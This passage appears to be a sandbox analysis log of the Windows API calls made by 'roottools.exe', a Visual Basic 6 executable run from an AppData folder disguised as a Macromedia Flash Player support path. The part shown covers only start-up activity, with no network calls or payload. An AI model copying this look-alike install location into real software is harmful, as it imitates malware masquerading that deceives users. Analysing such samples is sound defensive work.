"c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3862 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 3972 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3973 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3974 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3975 start_va = 0xb750000 end_va = 0xb84ffff entry_point = 0x0 region_type = private name = "private_0x000000000b750000" filename = "" Region: id = 3976 start_va = 0xb850000 end_va = 0xb94ffff entry_point = 0x0 region_type = private name = "private_0x000000000b850000" filename = "" Region: id = 3977 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 3978 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 308 os_tid = 0x7b4 [0328.166] GetVersion () returned 0x1db10106 [0328.167] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x759c0000 [0328.167] GetProcAddress (hModule=0x759c0000, lpProcName="IsTNT") returned 0x0 [0328.167] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1ea0000 [0328.167] VirtualAlloc (lpAddress=0x1ea0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1ea0000 [0328.168] GetCurrentThreadId () returned 0x7b4 [0328.168] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" [0328.168] GetEnvironmentStringsW () returned 0x534a40* [0328.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1379 [0328.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1379, lpMultiByteStr=0x2507d0, cbMultiByte=1379, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1379 [0328.168] FreeEnvironmentStringsW (penv=0x534a40) returned 1 [0328.168] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0328.168] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0328.168] GetFileType (hFile=0x0) returned 0x0 [0328.168] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0328.169] GetFileType (hFile=0x0) returned 0x0 [0328.169] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0328.169] GetFileType (hFile=0x0) returned 0x0 [0328.169] SetHandleCount (uNumber=0x20) returned 0x20 [0328.169] GetACP () returned 0x4e4 [0328.169] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0328.169] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0328.170] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x759c0000 [0328.170] GetProcAddress (hModule=0x759c0000, lpProcName="IsProcessorFeaturePresent") returned 0x759d5235 [0328.170] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0328.170] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0328.170] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0328.170] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0328.170] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0328.170] GetVersion () returned 0x1db10106 [0328.171] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0328.172] GetUserDefaultLCID () returned 0x409 [0328.172] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0328.172] GetSystemMetrics (nIndex=5) returned 1 [0328.172] GetSystemMetrics (nIndex=6) returned 1 [0328.172] GetSystemMetrics (nIndex=11) returned 32 [0328.172] GetSystemMetrics (nIndex=12) returned 32 [0328.172] GetSystemMetrics (nIndex=34) returned 132 [0328.172] GetSystemMetrics (nIndex=35) returned 38 [0328.172] GetSystemMetrics (nIndex=0) returned 1440 [0328.172] GetSystemMetrics (nIndex=1) returned 900 [0328.172] GetSystemMetrics (nIndex=32) returned 8 [0328.172] GetSystemMetrics (nIndex=33) returned 8 [0328.172] GetSystemMetrics (nIndex=42) returned 0 [0328.172] GetStockObject (i=15) returned 0x188000b [0328.172] GetStockObject (i=7) returned 0x1b00017 [0328.172] GetStockObject (i=6) returned 0x1b00018 [0328.172] GetStockObject (i=8) returned 0x1b00016 [0328.172] GetStockObject (i=4) returned 0x1900011 [0328.172] GetStockObject (i=2) returned 0x1900012 [0328.172] GetStockObject (i=0) returned 0x1900010 [0328.172] GetStockObject (i=5) returned 0x1900015 [0328.172] GetStockObject (i=13) returned 0x18a002e [0328.172] GetDC (hWnd=0x0) returned 0x7010156 [0328.172] GetTextExtentPointA (in: hdc=0x7010156, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0328.173] GetDeviceCaps (hdc=0x7010156, index=14) returned 1 [0328.173] GetDeviceCaps (hdc=0x7010156, index=12) returned 32 [0328.173] GetDeviceCaps (hdc=0x7010156, index=88) returned 96 [0328.173] GetDeviceCaps (hdc=0x7010156, index=90) returned 96 [0328.173] GetDeviceCaps (hdc=0x7010156, index=38) returned 32409 [0328.173] ReleaseDC (hWnd=0x0, hDC=0x7010156) returned 1 [0328.174] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x75c266bc) returned 0x0 [0328.174] GetCurrentThreadId () returned 0x7b4 [0328.174] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0328.174] GetCurrentThreadId () returned 0x7b4 [0328.174] GetCurrentThreadId () returned 0x7b4 [0328.174] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"" [0328.174] lstrlenA (lpString="") returned 0 [0328.174] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0328.174] SetErrorMode (uMode=0x8001) returned 0x0 [0328.174] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0328.174] GetUserDefaultLCID () returned 0x409 [0328.174] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0328.174] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0328.175] GetSystemDefaultLCID () returned 0x409 [0328.175] GetUserDefaultLCID () returned 0x409 [0328.175] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0328.175] GetStockObject (i=13) returned 0x18a002e [0328.175] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0328.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0328.175] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0328.175] lstrlenA (lpString="{xx}") returned 4 [0328.175] lstrlenA (lpString="VB98.CHM") returned 8 [0328.175] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0328.175] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0328.175] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0328.175] lstrlenA (lpString="{xx}") returned 4 [0328.175] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0328.175] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0328.175] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0328.175] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0328.175] lstrcpynA (in: lpString1=0x18fb70, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0328.175] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0328.175] lstrcpyA (in: lpString1=0x3717b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0328.175] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\AETADZJZ\\APPDATA\\ROAMING\\MACROMEDIA\\FLASH PLAYER\\MACROMEDIA.COM\\SUPPORT\\FLASHPLAYER\\SYS\\ROOTTOOLS.EXE") returned 111 [0328.177] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0328.177] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0328.177] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?AETADZJZ?APPDATA?ROAMING?MACROMEDIA?FLASH PLAYER?MACROMEDIA.COM?SUPPORT?FLASHPLAYER?SYS?ROOTTOOLS.EXE") returned 0x90 [0328.177] GetLastError () returned 0x0 [0328.177] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0328.177] OleInitialize (pvReserved=0x0) returned 0x0 [0328.181] OaBuildVersion () returned 0x321396 [0328.181] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x761b0000 [0328.182] GetLastError () returned 0x0 [0328.182] GetProcAddress (hModule=0x761b0000, lpProcName="OleLoadPictureEx") returned 0x762170a1 [0328.182] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc0de [0328.182] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0ae [0328.182] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0328.182] RegisterClassA (lpWndClass=0x18fc34) returned 0xc0e1 [0328.182] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0328.182] RegisterClassA (lpWndClass=0x18fc34) returned 0xc108 [0328.182] GetUserDefaultLCID () returned 0x409 [0328.182] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0328.182] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x210000 [0328.182] VirtualAlloc (lpAddress=0x210000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualAlloc (lpAddress=0x210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualAlloc (lpAddress=0x210000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualAlloc (lpAddress=0x210000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualAlloc (lpAddress=0x210000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0328.183] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0328.183] GetCurrentProcess () returned 0xffffffff [0328.183] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0328.183] GlobalAddAtomA (lpString="VBDisabled") returned 0xc01e [0328.183] GetVersion () returned 0x1db10106 [0328.183] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x761b0000 [0328.183] GetProcAddress (hModule=0x761b0000, lpProcName="DispCallFunc") returned 0x761c3dcf [0328.183] GetProcAddress (hModule=0x761b0000, lpProcName="LoadTypeLibEx") returned 0x761c07b7 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="UnRegisterTypeLib") returned 0x761e1ca9 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="CreateTypeLib2") returned 0x761c8e70 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDateFromUdate") returned 0x761c7684 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarUdateFromDate") returned 0x761ccc98 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="GetAltMonthNames") returned 0x761f903a [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarNumFromParseNum") returned 0x761c6231 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarParseNumFromStr") returned 0x761c5fea [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR4") returned 0x761d3f94 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromR8") returned 0x761d4e9e [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromDate") returned 0x761fdb72 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromI4") returned 0x761e2a8c [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecFromCy") returned 0x761fd737 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="VarR4FromDec") returned 0x761fe015 [0328.184] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x761fcc3d [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="GetRecordInfoFromGuids") returned 0x761fd1c4 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetRecordInfo") returned 0x761fd48c [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetRecordInfo") returned 0x761fd4c6 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayGetIID") returned 0x761fd509 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArraySetIID") returned 0x761ce7bb [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCopyData") returned 0x761ce496 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x761cddf1 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="SafeArrayCreateEx") returned 0x761fd53f [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormat") returned 0x76202055 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatDateTime") returned 0x762020ea [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatNumber") returned 0x76202151 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatPercent") returned 0x762021f5 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarFormatCurrency") returned 0x76202288 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarWeekdayName") returned 0x76202335 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarMonthName") returned 0x762023d5 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarAdd") returned 0x761d5934 [0328.185] GetProcAddress (hModule=0x761b0000, lpProcName="VarAnd") returned 0x761d5a98 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarCat") returned 0x761d59b4 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarDiv") returned 0x7622e405 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarEqv") returned 0x7622ef07 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarIdiv") returned 0x7622f00a [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarImp") returned 0x7622ef47 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarMod") returned 0x7622f15e [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarMul") returned 0x7622dbd4 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarOr") returned 0x7622ecfa [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarPow") returned 0x7622ea66 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarSub") returned 0x7622d332 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarXor") returned 0x7622ee2e [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarAbs") returned 0x7622ca11 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarFix") returned 0x7622cc5f [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarInt") returned 0x7622cde7 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarNeg") returned 0x7622c802 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarNot") returned 0x7622ec66 [0328.186] GetProcAddress (hModule=0x761b0000, lpProcName="VarRound") returned 0x7622d155 [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarCmp") returned 0x761cb0dc [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecAdd") returned 0x761e5f3e [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarDecCmp") returned 0x761d4fd0 [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCat") returned 0x761d0d2c [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarCyMulI4") returned 0x761e59ed [0328.187] GetProcAddress (hModule=0x761b0000, lpProcName="VarBstrCmp") returned 0x761bf8b8 [0328.187] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x75ae0000 [0328.187] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstanceEx") returned 0x75b29d4e [0328.187] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromProgIDEx") returned 0x75af0782 [0328.187] GetSystemMetrics (nIndex=42) returned 0 [0328.187] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x75c266bc) returned 0x0 [0328.187] IMalloc:Alloc (This=0x75c266bc, cb=0x4) returned 0x538fb0 [0328.187] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0328.187] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg" [0328.187] SetLastError (dwErrCode=0x0) [0328.187] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0328.188] SetLastError (dwErrCode=0x2) [0328.188] GetLastError () returned 0x2 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="MTX") returned 1 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="DLLHOST") returned 1 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="INETINFO") returned 1 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="W3WP") returned -1 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="ASPNET_WP") returned 1 [0328.188] lstrcmpiA (lpString1="roottools", lpString2="DLLHST3G") returned 1 [0328.188] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe")) returned 0x6e [0328.188] lstrcmpiA (lpString1="roottools", lpString2="IEXPLORE") returned 1 [0328.188] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74e30000 [0328.189] GetLastError () returned 0x0 [0328.189] GetProcAddress (hModule=0x74e30000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74e77685 [0328.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0328.189] CoRegisterMessageFilter (in: lpMessageFilter=0x372054, lplpMessageFilter=0x37205c | out: lplpMessageFilter=0x37205c*=0x0) returned 0x0 [0328.189] IUnknown:AddRef (This=0x372054) returned 0x2 [0328.189] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0328.189] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x50109 [0328.190] GetModuleHandleA (lpModuleName="USER32") returned 0x758c0000 [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="GetSystemMetrics") returned 0x758d7d2f [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromWindow") returned 0x758e3150 [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromRect") returned 0x758fe7a0 [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="MonitorFromPoint") returned 0x758e5281 [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="EnumDisplayMonitors") returned 0x758e451a [0328.190] GetProcAddress (hModule=0x758c0000, lpProcName="GetMonitorInfoA") returned 0x758e4413 [0328.190] GetSystemMetrics (nIndex=0) returned 1440 [0328.190] GetSystemMetrics (nIndex=78) returned 1440 [0328.190] GetSystemMetrics (nIndex=1) returned 900 [0328.190] GetSystemMetrics (nIndex=79) returned 900 [0328.190] GetSystemMetrics (nIndex=50) returned 16 [0328.190] GetSystemMetrics (nIndex=49) returned 16 [0328.190] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x700c1 [0328.190] RegisterClassExA (param_1=0x18fe78) returned 0x8ec0e0 [0328.190] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x20154 [0328.191] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0328.191] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0328.191] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0328.191] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0328.191] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0328.191] MonitorFromWindow (hwnd=0x20154, dwFlags=0x2) returned 0x10001 [0328.191] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0328.192] SetWindowPos (hWnd=0x20154, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0328.192] ShowWindow (hWnd=0x20154, nCmdShow=4) returned 0 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0328.192] NtdllDefWindowProc_A (hWnd=0x20154, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0328.192] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x7b4 [0328.192] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0328.192] GetUserDefaultLCID () returned 0x409 [0328.192] IsValidCodePage (CodePage=0x3a4) returned 1 [0328.193] IsValidCodePage (CodePage=0x3b5) returned 1 [0328.193] IsValidCodePage (CodePage=0x3b6) returned 1 [0328.193] IsValidCodePage 